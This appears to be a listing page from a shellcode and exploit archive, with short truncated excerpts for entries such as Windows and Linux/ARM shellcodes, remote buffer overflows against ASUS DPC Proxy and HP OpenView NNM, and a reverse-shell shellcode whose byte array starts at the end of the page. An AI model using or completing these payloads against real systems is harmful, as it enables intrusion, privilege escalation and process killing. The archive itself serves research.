About Shellcodes in C

This is a follow up of our previous introductory post about shellcodes. Here we aim for coding more complex shellcodes directly in C. We'll mostly use default tools like gcc and as, at the end also a small python script to reorder and pack things. We'll play with linux but the concepts and script...

Smiasm - Reverse engineering framework

Smiasm - Reverse engineering framework What is Miasm? Miasm is a a free and open source GPLv2 reverse engineering framework. Miasm aims at analyzing/modifying/generating binary programs. Here is a non exhausting list of features: opening/modifying/generating PE/ELF 32/64 le/be using Elfesteem...

win32 / Windows7 Sp1 - rename .jpeg to .vir - 57 bytes

Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir 57 bytes Date: July, 23 2011 Author: Theuzuki.' Vendor or Software Link: - Version: - Category:: shellcodes Google dork: - Tested on: Windows 7 sp 1 Demo site: - ================================================== Made by: . . \ /| | | | \...

win32/ 7 sp1 MessageBox 67 bytes

Exploit Title: win32/ 7 sp1 MessageBox Date: July, 23 2011 Author: Theuzuki.' Vendor or Software Link: - Version: - Category:: shellcodes Google dork: - Tested on: Windows 7 sp 1 Demo site: - ================================================== Discovered by: . . \ /| | | | \ | | || | | | | / | |...

win32/xp sp3 Windows Magnifier Shellcode 52 bytes

Exploit Title: win32/xp sp3 Windows Magnifier Shellcode 52 bytes + Author : ^Xecuti0n3r + E-mail : xecuti0n3ryahoo.com + Category : win32-Shellcodes + Tested on : Windows Xp 32 bit 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ ...

win32/xp sp3 StarWars Movie Shellcode 74 bytes

Exploit Title: win32/xp sp3 StarWars Movie Shellcode 74 bytes + Author : ^Xecuti0n3r + E-mail : xecuti0n3ryahoo.com + Category : win32-Shellcodes + Tested on : Windows Xp 32 bit 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ ...

HT Editor 2.0.18 - File Opening Stack Overflow

HT Editor 2.0.18 - File Opening Stack Overflow Exploit Title: HT Editor File openning Stack Overflow 0day Date: March 30th 2011 Author: ZadYree Software Link: http://hte.sourceforge.net/downloads.html Version: Thanks =cut use 5.010; my $esp, $retaddr; my $scz =...

Linux/ARM - setuid0 & kill-1, SIGKILL 28 bytes

Linux/ARM - setuid0 & kill-1, SIGKILL - 28 bytes. Shellcode exploit for linux platform / Title: Linux/ARM - setuid0 & kill-1, SIGKILL - 28 bytes Kill all processes Date: 2010-06-29 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan...

Linux/ARM - execve"/bin/sh","/bin/sh",0 30 bytes

Linux/ARM - execve"/bin/sh","/bin/sh",0 - 30 bytes. Shellcode exploit for linux platform / Title: Linux/ARM - execve"/bin/sh","/bin/sh",0 - 30 bytes Date: 2010-06-28 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Dtabase of...

Linux x86 - execve"/bin/bash","-p",NULL 33 bytes

Linux x86 - execve"/bin/bash","-p",NULL - 33 bytes. Shellcode exploit for linx86 platform / Title: Linux x86 - execve"/bin/bash", "/bin/bash", "-p", NULL - 33 bytes Author: Jonathan Salwan Mail: [email protected] Web: http://www.shell-storm.org !Database of Shellcodes...

asus-overflow.txt

/ Dreatica-FXP crew ---------------------------------------- Target : ASUS DPC Proxy 2.0.0.16/2.0.0.24 ---------------------------------------- Exploit : ASUS DPC Proxy 2.0.0.16/2.0.0.19 Remote Buffer Overflow Exploit Exploit date : 02.04.2008 Exploit writer : Heretic2 [email protected] OS :...

ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow

/ Dreatica-FXP crew ---------------------------------------- Target : ASUS DPC Proxy 2.0.0.16/2.0.0.24 ---------------------------------------- Exploit : ASUS DPC Proxy 2.0.0.16/2.0.0.19 Remote Buffer Overflow Exploit Exploit date : 02.04.2008 Exploit writer : Heretic2 [email protected] OS :...

hpovalarmsrv-overflow.txt

/ Dreatica-FXP crew ---------------------------------------- Target : HP OpenView Network Node Manager v7.5 ---------------------------------------- Exploit : HP OpenView NNM v7.5.1 ovalarmsrv.exe Remote Buffer Overflow Exploit Exploit date : 07.04.2008 Exploit writer : Heretic2 [email protected]...

HP OpenView Network Node Manager (OV NNM) 7.5.1 - ovalarmsrv.exe Remote Overflow

HP OpenView Network Node Manager OV NNM 7.5.1 - ovalarmsrv.exe Remote Overflow / Dreatica-FXP crew ---------------------------------------- Target : HP OpenView Network Node Manager v7.5 ---------------------------------------- Exploit : HP OpenView NNM v7.5.1 ovalarmsrv.exe Remote Buffer Overflo...

Utility for generating HTTP/1.x requests for shellcodes

No description provided by source. / genhttpreq.c, utility for generating HTTP/1.x requests for shellcodes SIZES: HTTP/1.0 header request size - 18 bytes+ HTTP/1.1 header request size - 26 bytes+ NOTE: The length of the selected HTTP header is stored at EDX register. Thus the generated MOV...

Utility for generating HTTP/1.x requests for shellcodes

Utility for generating HTTP/1.x requests for shellcodes. Shellcode exploit for generator platform / genhttpreq.c, utility for generating HTTP/1.x requests for shellcodes SIZES: HTTP/1.0 header request size - 18 bytes+ HTTP/1.1 header request size - 26 bytes+ NOTE: The length of the selected HTTP...

Utility for generating HTTP/1.x requests for shellcodes

Exploit for generator platform in category shellcode ======================================================= Utility for generating HTTP/1.x requests for shellcodes ======================================================= / genhttpreq.c, utility for generating HTTP/1.x requests for shellcodes SIZE...

sas.txt

include include include include include include include include // reverse shellcode unsigned char reverseshell = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"...